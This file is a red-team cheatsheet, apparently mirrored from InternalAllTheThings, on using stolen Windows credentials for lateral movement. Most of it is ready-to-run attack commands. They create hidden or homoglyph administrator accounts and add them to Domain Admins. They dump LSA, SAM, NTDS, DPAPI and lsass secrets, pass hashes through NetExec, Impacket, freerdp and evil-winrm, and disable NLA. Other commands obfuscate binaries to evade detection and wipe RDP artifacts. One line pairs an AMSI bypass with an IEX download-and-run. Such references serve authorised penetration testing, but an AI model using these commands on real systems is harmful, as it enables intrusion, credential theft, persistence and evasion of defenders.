daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

windows-using-credentials.md (19883B)


      1 ---
      2 title: "Windows - Using credentials"
      3 section: "Red Team"
      4 sectionSlug: "redteam"
      5 sourcePath: "docs/redteam/access/windows-using-credentials.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/access/windows-using-credentials.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Windows - Using credentials
     12 
     13 ## Summary
     14 
     15 * [Get Credentials](#get-credentials)
     16     * [Create Credential](#create-credential)
     17     * [Looting Credentials](#looting-credentials)
     18     * [Guest Credential](#guest-credential)
     19     * [Retail Credential](#retail-credential)
     20     * [Sandbox Credential](#sandbox-credential)
     21 * [NetExec](#netexec)
     22 * [Impacket](#impacket)
     23     * [PSExec](#psexec)
     24     * [WMIExec](#wmiexec)
     25     * [SMBExec](#smbexec)
     26 * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
     27 * [Powershell Remoting Protocol](#powershell-remoting-protocol)
     28     * [Powershell Credentials](#powershell-credentials)
     29     * [Powershell PSSESSION](#powershell-pssession)
     30     * [Powershell Secure String](#powershell-secure-string)
     31 * [SSH Protocol](#ssh-protocol)
     32 * [WinRM Protocol](#winrm-protocol)
     33 * [WMI Protocol](#wmi-protocol)
     34 * [Other Methods](#other-methods)
     35     * [PsExec - Sysinternals](#psexec---sysinternals)
     36     * [Mount a remote share](#mount-a-remote-share)
     37     * [Run as another user](#run-as-another-user)
     38 
     39 ## Get Credentials
     40 
     41 ### Create Credential
     42 
     43 ```powershell
     44 net user hacker Hcker_12345678* /add /Y
     45 net localgroup administrators hacker /add
     46 net localgroup "Remote Desktop Users" hacker /add # RDP access
     47 net localgroup "Backup Operators" hacker /add # Full access to files
     48 net group "Domain Admins" hacker /add /domain
     49 
     50 # enable a domain user account
     51 net user hacker /ACTIVE:YES /domain
     52 
     53 # prevent users from changing their password
     54 net user username /Passwordchg:No
     55 
     56 # prevent the password to expire
     57 net user hacker /Expires:Never
     58 
     59 # create a machine account (not shown in net users)
     60 net user /add evilbob$ evilpassword
     61 
     62 # homoglyph Aԁmіnistratοr (different of Administrator)
     63 Aԁmіnistratοr
     64 ```
     65 
     66 Some info about your user
     67 
     68 ```powershell
     69 net user /dom
     70 net user /domain
     71 ```
     72 
     73 ### Looting Credentials
     74 
     75 ```ps1
     76 nxc smb 10.10.10.10 -u username -p password -d domain --lsa
     77 nxc smb 10.10.10.10 -u username -p password -d domain --sam
     78 nxc smb 10.10.10.10 -u username -p password -d domain --dpapi nosystem
     79 nxc smb 10.10.10.10 -u username -p password -d domain --dpapi cookies
     80 nxc smb 10.10.10.10 -u username -p password -d domain --dpapi
     81 nxc smb 10.10.10.10 -u username -p password -d domain --sccm
     82 nxc smb 10.10.10.10 -u username -p password -d domain --ntds
     83 nxc smb 10.10.10.10 -u username -p password -d domain -M lsassy
     84 nxc smb 10.10.10.10 -u username -p password -d domain -M nanodump
     85 nxc smb 10.10.10.10 -u username -p password -d domain -M veeam
     86 nxc smb 10.10.10.10 -u username -p password -d domain -M winscp
     87 nxc smb 10.10.10.10 -u username -p password -d domain -M putty
     88 nxc smb 10.10.10.10 -u username -p password -d domain -M vnc
     89 nxc smb 10.10.10.10 -u username -p password -d domain -M mremoteng
     90 nxc smb 10.10.10.10 -u username -p password -d domain -M rdcman
     91 ```
     92 
     93 ### Guest Credential
     94 
     95 By default every Windows machine comes with a Guest account, its default password is empty.
     96 
     97 ```powershell
     98 Username: Guest
     99 Password: [EMPTY]
    100 NT Hash: 31d6cfe0d16ae931b73c59d7e0c089c0
    101 ```
    102 
    103 ### Retail Credential
    104 
    105 Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289)
    106 
    107 when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin
    108 
    109 ```powershell
    110 Username: RetailAdmin
    111 Password: trs10
    112 ```
    113 
    114 ### Sandbox Credential
    115 
    116 WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608)
    117 
    118 Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard
    119 
    120 ```powershell
    121 \\windowssandbox
    122 Username: wdagutilityaccount
    123 Password: pw123
    124 ```
    125 
    126 ## netexec
    127 
    128 Using [mpgn/netexec](https://github.com/Pennyw0rth/NetExec)
    129 
    130 * netexec supports many protocols
    131 
    132     ```powershell
    133     netexec ldap 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" 
    134     netexec mssql 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0"
    135     netexec rdp 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" 
    136     netexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0"
    137     netexec winrm 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0"
    138     ```
    139 
    140 * netexec works with password, NT hash and Kerberos authentication
    141 
    142     ```powershell
    143     netexec smb 192.168.1.100 -u Administrator -p "Password123?" # Password
    144     netexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" # NT Hash
    145     export KRB5CCNAME=/tmp/kerberos/admin.ccache; netexec smb 192.168.1.100 -u admin --use-kcache # Kerberos
    146     ```
    147 
    148 ## Impacket
    149 
    150 From [fortra/impacket](https://github.com/fortra/impacket) (:warning: renamed to impacket-xxxxx in Kali)
    151 :warning: `get` / `put` for wmiexec, psexec, smbexec, and dcomexec are changing to `lget` and `lput`.
    152 :warning: French characters might not be correctly displayed on your output, use `-codec ibm850` to fix this.
    153 :warning: By default, Impacket's scripts are stored in the examples folder: `impacket/examples/psexec.py`.
    154 
    155 All Impacket's *exec scripts are not equal, they will target services hosted on multiples ports.
    156 The following table summarize the port used by each scripts.
    157 
    158 | Method      | Port Used                             | Admin Required |
    159 |-------------|---------------------------------------|----------------|
    160 | psexec.py   | tcp/445                               | Yes            |
    161 | smbexec.py  | tcp/445                               | No             |
    162 | atexec.py   | tcp/445                               | No             |
    163 | dcomexec.py | tcp/135, tcp/445, tcp/49751 (DCOM)    | No             |
    164 | wmiexec.py  | tcp/135, tcp/445, tcp/50911 (Winmgmt) | Yes            |
    165 
    166 * `psexec`: equivalent of Windows PSEXEC using RemComSvc binary.
    167 
    168     ```ps1
    169     psexec.py DOMAIN/username:password@10.10.10.10
    170     ```
    171 
    172 * `smbexec`: a similar approach to PSEXEC w/o using RemComSvc
    173 
    174     ```ps1
    175     smbexec.py DOMAIN/username:password@10.10.10.10
    176     ```
    177 
    178 * `atexec`: executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
    179 
    180     ```ps1
    181     atexec.py DOMAIN/username:password@10.10.10.10
    182     ```
    183 
    184 * `dcomexec`: a semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints
    185 
    186     ```ps1
    187     dcomexec.py DOMAIN/username:password@10.10.10.10
    188     ```
    189 
    190 * `wmiexec`: a semi-interactive shell, used through Windows Management Instrumentation. First it uses ports tcp/135 and tcp/445, and ultimately it communicates with the Winmgmt Windows service over dynamically allocated high port such as tcp/50911.
    191 
    192     ```ps1
    193     wmiexec.py DOMAIN/username:password@10.10.10.10
    194     wmiexec.py DOMAIN/username@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    195     ```
    196 
    197 To allow Non-RID 500 local admin accounts performing Wmi or PsExec, execute:
    198 `reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /f /d 1`
    199 To prevent RID 500 from being able to WmiExec or PsExec, execute:
    200 `reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /f /d 1`
    201 
    202 ### PSExec
    203 
    204 Instead of uploading `psexeccsv` service binary, it uploads to `ADMIN$` a service binary with an arbitrary name.
    205 PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections ([snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb))
    206 
    207 Use a custom binary and service name with : `psexec.py Administrator:Password123@IP -service-name customservicename -remote-binary-name custombin.exe`
    208 
    209 Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCustom.exe`.
    210 You need to update the pipe name to match "Custom_communication" in the line 163
    211 
    212 ```py
    213 162    tid = s.connectTree('IPC$')
    214 163    fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)
    215 ```
    216 
    217 Alternatively you can use the fork [ThePorgs/impacket](https://github.com/ThePorgs/impacket/pull/3/files).
    218 
    219 ### WMIExec
    220 
    221 Use a non default share `-share SHARE` to write the output to reduce the detection.
    222 By default this command is executed:
    223 
    224 ```ps1
    225 cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1
    226 ```
    227 
    228 ### SMBExec
    229 
    230 It creates a service with the name `BTOBTO` ([smbexec.py#L59](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L59)) and transfers commands from the attacker in a bat file in `%TEMP/execute.bat` ([smbexec.py#L56](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L56)).
    231 
    232 ```py
    233 OUTPUT_FILENAME = '__output'
    234 BATCH_FILENAME  = 'execute.bat'
    235 SMBSERVER_DIR   = '__tmp'
    236 DUMMY_SHARE     = 'TMP'
    237 SERVICE_NAME    = 'BTOBTO'
    238 ```
    239 
    240 It will create a new service every time we execute a command. It will also generate an Event 7045.
    241 
    242 By default this command is executed: `%COMSPEC% /Q /c echo dir > \\127.0.0.1\C$\__output 2>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat`, where `%COMSPEC%` points to `C:\WINDOWS\system32\cmd.exe`.
    243 
    244 ```py
    245 class RemoteShell(cmd.Cmd):
    246     def __init__(self, share, rpc, mode, serviceName, shell_type):
    247         cmd.Cmd.__init__(self)
    248         self.__share = share
    249         self.__mode = mode
    250         self.__output = '\\\\127.0.0.1\\' + self.__share + '\\' + OUTPUT_FILENAME
    251         self.__batchFile = '%TEMP%\\' + BATCH_FILENAME
    252         self.__outputBuffer = b''
    253         self.__command = ''
    254         self.__shell = '%COMSPEC% /Q /c '
    255         self.__shell_type = shell_type
    256         self.__pwsh = 'powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc '
    257         self.__serviceName = serviceName
    258 ```
    259 
    260 ## RDP Remote Desktop Protocol
    261 
    262 :warning: **NOTE**: You may need to enable RDP and disable NLA and fix CredSSP errors.
    263 
    264 * Enable RDP
    265 
    266     ```powershell
    267     PS C:\> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
    268     PS C:\> netsh firewall set service remoteadmin enable
    269     PS C:\> netsh firewall set service remotedesktop enable
    270 
    271     # Alternative
    272     C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
    273     root@payload$ netexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
    274     ```
    275 
    276 * Fix **CredSSP** errors
    277 
    278     ```ps1
    279     reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    280     reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
    281     ```
    282 
    283 **Network Level Authentication** requires the user to authenticate before a remote desktop session is fully established. This happens before the remote desktop interface is loaded, reducing the risk of certain attacks.
    284 
    285 * Take screenshot when NLA is disabled
    286 
    287     ```ps1
    288     netexec rdp 10.10.10.10 -u user -p pass --nla-screenshot
    289     ```
    290 
    291 * Disable Network Level Authentication (NLA)
    292 
    293     ```ps1
    294     PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").UserAuthenticationRequired
    295     PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
    296     ```
    297 
    298 On Windows, the native Remote Desktop client is `mstsc.exe`.
    299 When launched with the `/public` switch, RDP runs in Public Mode, which uses temporary, non-persistent session settings.
    300 
    301 ```ps1
    302 mstsc /public /v:server01
    303 ```
    304 
    305 Public Mode is designed for shared systems, jump hosts, and security-sensitive environments, where leaving local artifacts or cached credentials would present an operational risk.
    306 
    307 When RDP is launched in Public Mode, the client will:
    308 
    309 * Not save credentials
    310 * Not use cached credentials
    311 * Not save connection history
    312 * Not load local RDP settings (printers, drives, clipboard, etc.)
    313 * Not store passwords in Credential Manager
    314 
    315 If RDP was launched without /public, local artifacts may persist.
    316 These can be manually removed using the following PowerShell commands.
    317 
    318 ```ps1
    319 # Remove Stored RDP Credentials
    320 cmdkey /list | ? { $_ -Match "TERMSRV/" } | % { $_ -Replace ".*: " } | % { cmdkey /delete:$_ }
    321 
    322 # Remove Cached Bitmaps and Client Data
    323 Remove-Item -Path "$Env:LocalAppData\Microsoft\Terminal Server Client\Cache" -Recurse -ErrorAction SilentlyContinue
    324 
    325 # Remove RDP Connection History and Device Mappings
    326 Remove-Item -Path "HKCU:\Software\Microsoft\Terminal Server Client\Default" -Force -ErrorAction SilentlyContinue
    327 Remove-Item -Path "HKCU:\Software\Microsoft\Terminal Server Client\Servers" -Recurse -Force -ErrorAction SilentlyContinue
    328 Remove-Item -Path "HKCU:\Software\Microsoft\Terminal Server Client\LocalDevices" -Recurse -Force -ErrorAction SilentlyContinue
    329 ```
    330 
    331 Abuse RDP protocol to execute commands remotely with the following commands:
    332 
    333 * [Pennyw0rth/netexec](https://github.com/Pennyw0rth/NetExec)
    334 
    335     ```ps1
    336     netexec rdp 10.10.10.10 -u user -p pass
    337     ```
    338 
    339 * [rdesktop](http://www.rdesktop.org/)
    340 
    341     ```powershell
    342     root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
    343     root@payload$ rdesktop -u username -p password -g 70% -r disk:share=/tmp/myshare 10.10.10.10
    344     # -g : the screen will take up 70% of your actual screen size
    345     # -r disk:share : sharing a local folder during a remote desktop session 
    346     ```
    347 
    348 * [freerdp](https://www.freerdp.com)
    349 
    350     ```powershell
    351     root@payload$ xfreerdp /v:10.0.0.1 /u:'Username' /p:'Password123!' +clipboard /cert-ignore /size:1366x768 /smart-sizing
    352     root@payload$ xfreerdp /v:10.0.0.1 /u:username # password will be asked
    353     
    354     # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
    355     # pass the hash works for Server 2012 R2 / Win 8.1+
    356     # require freerdp2-x11 freerdp2-shadow-x11 packages instead of freerdp-x11
    357     root@payload$ xfreerdp /v:10.0.0.1 /u:username /d:domain /pth:88a405e17c0aa5debbc9b5679753939d  
    358     ```
    359 
    360 * [0xthirteen/SharpRDP](https://github.com/0xthirteen/SharpRDP)
    361 
    362     ```powershell
    363     PS C:\> SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
    364     ```
    365 
    366 ## Powershell Remoting Protocol
    367 
    368 ### Powershell Credentials
    369 
    370 ```ps1
    371 PS> $pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
    372 PS> $cred = New-Object System.Management.Automation.PSCredential ('DOMAIN\Username', $pass)
    373 ```
    374 
    375 ### Powershell PSSESSION
    376 
    377 * Enable PSRemoting on the host
    378 
    379     ```ps1
    380     Enable-PSRemoting -Force
    381     net start winrm  
    382 
    383     # Add the machine to the trusted hosts
    384     Set-Item wsman:\localhost\client\trustedhosts *
    385     Set-Item WSMan:\localhost\Client\TrustedHosts -Value "10.10.10.10"
    386     ```
    387 
    388 * Execute a single command
    389 
    390     ```powershell
    391     PS> Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
    392     PS> Invoke-Command -computername DC01,CLIENT1 -scriptBlock { Get-Service }
    393     PS> Invoke-Command -computername DC01,CLIENT1 -filePath c:\Scripts\Task.ps1
    394     ```
    395 
    396 * Interact with a PS Session
    397 
    398     ```powershell
    399     PS> Enter-PSSession -computerName DC01
    400     [DC01]: PS>
    401 
    402     # one-to-one execute scripts and commands
    403     PS> $Session = New-PSSession -ComputerName CLIENT1
    404     PS> Invoke-Command -Session $Session -scriptBlock { $test = 1 }
    405     PS> Invoke-Command -Session $Session -scriptBlock { $test }
    406     1
    407     ```
    408 
    409 ### Powershell Secure String
    410 
    411 ```ps1
    412 $aesKey = (49, 222, 253, 86, 26, 137, 92, 43, 29, 200, 17, 203, 88, 97, 39, 38, 60, 119, 46, 44, 219, 179, 13, 194, 191, 199, 78, 10, 4, 40, 87, 159)
    413 $secureObject = ConvertTo-SecureString -String "76492d11167[SNIP]MwA4AGEAYwA1AGMAZgA=" -Key $aesKey
    414 $decrypted = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureObject)
    415 $decrypted = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($decrypted)
    416 $decrypted
    417 ```
    418 
    419 ## WinRM Protocol
    420 
    421 **Requirements**:
    422 
    423 * Port **5985** or **5986** open.
    424 * Default endpoint is **/wsman**
    425 
    426 If WinRM is disabled on the system you can enable it using: `winrm quickconfig`
    427 
    428 The easiest way to interact over WinRM on Linux is with [Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm)
    429 
    430 ```powershell
    431 evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
    432 evil-winrm -i 10.0.0.20 -u username -H HASH
    433 evil-winrm -i 10.0.0.20 -u username -p password -r domain.local
    434 
    435 *Evil-WinRM* PS > Bypass-4MSI
    436 *Evil-WinRM* PS > IEX([Net.Webclient]::new().DownloadString("http://127.0.0.1/PowerView.ps1"))
    437 ```
    438 
    439 ## WMI Protocol
    440 
    441 ```powershell
    442 PS C:\> wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe”
    443 ```
    444 
    445 ## SSH Protocol
    446 
    447 :warning: You cannot pass the hash to SSH
    448 
    449 * Connect using username/password of a Domain User
    450 
    451     ```ps1
    452     ssh -l user@domain 192.168.1.1
    453     ```
    454 
    455 * Connect with a Kerberos ticket
    456 
    457     ```ps1
    458     cp user.ccache /tmp/krb5cc_1045
    459     ssh -o GSSAPIAuthentication=yes user@domain.local -vv
    460     ```
    461 
    462 ## Other Methods
    463 
    464 ### PsExec - Sysinternals
    465 
    466 From Windows - [Sysinternals](https://learn.microsoft.com/en-us/sysinternals/)
    467 
    468 ```powershell
    469 PsExec.exe  \\srv01.domain.local -u DOMAIN\username -p password cmd.exe
    470 
    471 # switch admin user to NT Authority/System
    472 PsExec.exe  \\srv01.domain.local -u DOMAIN\username -p password cmd.exe -s 
    473 ```
    474 
    475 Sysinternals can be installed using the Windows Package Manager or downloaded from [live.sysinternals.com](https://live.sysinternals.com/).
    476 
    477 ```ps1
    478 winget install --id Microsoft.Sysinternals.Suite
    479 winget install Microsoft.sysinternals --accept-source-agreements --accept-package-agreements 
    480 ```
    481 
    482 ### Mount a remote share
    483 
    484 ```powershell
    485 net use \\srv01.domain.local /user:DOMAIN\username password C$
    486 ```
    487 
    488 ### Run as another user
    489 
    490 Runas is a command-line tool that is built into Windows Vista.
    491 Allows a user to run specific tools and programs with different permissions than the user's current logon provides.
    492 
    493 ```powershell
    494 runas /netonly /user:DOMAIN\username "cmd.exe"
    495 runas /noprofil /netonly /user:DOMAIN\username cmd.exe
    496 ```
    497 
    498 ## References
    499 
    500 * [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
    501 * [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
    502 * [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)
    503 * [Impacket Remote code execution on Windows from Linux by Vry4n_ - Jun 20, 2021](https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/)
    504 * [Impacket Exec Commands Cheat Sheet - 13cubed](https://www.13cubed.com/downloads/impacket_exec_commands_cheat_sheet.pdf)
    505 * [SMB protocol cheatsheet - aas-s3curity](https://aas-s3curity.gitbook.io/cheatsheet/internalpentest/active-directory/post-exploitation/lateral-movement/smb-protocol)
    506 * [Windows Lateral Movement with smb, psexec and alternatives - nv2lt](https://nv2lt.github.io/windows/smb-psexec-smbexec-winexe-how-to/)
    507 * [PsExec.exe IOCs and Detection - Threatexpress](https://threatexpress.com/redteaming/tool_ioc/psexec/)
    508 * [A Dive on SMBEXEC - dmcxblue - 8th Feb 2021](https://0x00sec.org/t/a-dive-on-smbexec/24961)